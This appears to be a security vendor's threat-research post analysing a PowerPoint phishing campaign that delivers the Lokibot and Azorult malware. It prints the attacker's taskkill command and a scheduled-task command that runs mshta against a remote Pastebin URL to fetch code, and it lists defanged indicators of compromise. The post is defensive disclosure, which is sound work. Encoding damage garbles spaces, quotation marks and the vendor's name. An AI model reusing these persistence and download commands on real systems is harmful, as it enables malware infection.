PowerPoint Malware References Drake Lyrics to Drop Lokibot & Azorult
A malware campaign using PowerPoint as the infection vector caught our eye after we noticed it contained lyrics to a popular Drake song hidden inside a PowerShell command. Depending on the victim, it either dropped the Lokibot info stealer or Azorult remote access trojan. This infection chain all starts with a simple email, such as the example pictured below.
听
Heavy Obfuscation
Upon opening either of the PowerPoint attachments, it automatically runs a heavily obfuscated visual basic script.
This script uses the Microsoft HTML application host (mshta.exe) to reach out to a Bitly shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses the command line to task kill Excel & Word, if running.
"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe
After that, it creates a scheduled task for mshta to reach out to a Pastebin url every 60 minutes. This is where an encoded script is located and the url it retrieves dictates whether the recipient ultimately receives the Lokibot or Azorult payload in our samples.
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F
Once decoded, this translates into a PowerShell script that contains a reference to Drake's "Keke Do You Love Me" lyrics. This attacker 鈥淢aster X鈥, retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet. "Master X" also obfuscated the 鈥楧ownloadString鈥 inside this PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity.
This script reaches out to paste.ee and downloads a malicious executable named calc.exe. We can see this retrieved malicious executable file header when loading up the paste.ee site.
听
Sanitized Indicators of Compromise:
Lokibot sample:
Dropped executable file
听听听听听听听听听听听听听听听 sha256听 听 听80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22
听 听 听 听 听 听 听 听听C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe
DNS requests
听听听听听听听听听听听听听听听 domain d228z91au11ukj.cloudfront[.]net听听听听听听听听听听听听
听听听听听听听听听听听听听听听 domain xnasxjnasn.blogspot[.]com听听听听听听听听听
听听听听听听听听听听听听听听听 domain paste[.]ee听听听听听听听听听听
听听听听听听听听听听听听听听听 domain j[.]mp听听
Connections
听听听听听听听听听听听听听听听 ip听听听听听听听听听听听 143.204.214.11听
听听听听听听听听听听听听听听听 ip听听听听听听听听听听听 104.20.68.143听听听听
听听听听听听听听听听听听听听听 ip听听听听听听听听听听听 107.175.150.73听
HTTP/HTTPS requests
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://j[.]mp/mo7xasnnr听听听听听听听听听听听听
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://107.175.150[.]73/~giftioz/.cttr/fre.php听听
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://pastebin[.]com/raw/CNtXYPpn听听
Azorult example:
Main object - "Purchase Order A6.pps"
听听听听听听听听听听听听听听听 sha256听 a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3听听听听听听听听听
DNS requests
听听听听听听听听听听听听听听听 domain j[.]mp听听
听听听听听听听听听听听听听听听 domain xnasxjnasn.blogspot[.]com听听听听听听听听听
听听听听听听听听听听听听听听听 domain resources.blogblog[.]com听听听听听听听听听听听
听听听听听听听听听听听听听听听 domain paste[.]ee听听听听听听听听听听
Connections
听听听听听听听听听听听听听听听 ip听听听听听听听听听听听 104.20.68.143听听听听
听听听听听听听听听听听听听听听 ip听听听听听听听听听听听 23.106.160.1听听听听听听
HTTP/HTTPS requests
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://j[.]mp/ml2xasnnr听听听听听听听听听听听听听
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://pastebin[.]com/raw/C5qNg3Dr听听
听听听听听听听听听听听听听听听 url听听听听听听听听听听 hxxp://paste[.]ee/r/sFV9L听听听听听听听听听听听
听 听 听 听 听 听 听 听 听url听 听 听 听 听 听 听hxxp://23.106.160[.]1/Panel/2/index.php
Learn more about how听advanced threat protection from 秋葵视频色听can help protect your organization from this and other threats.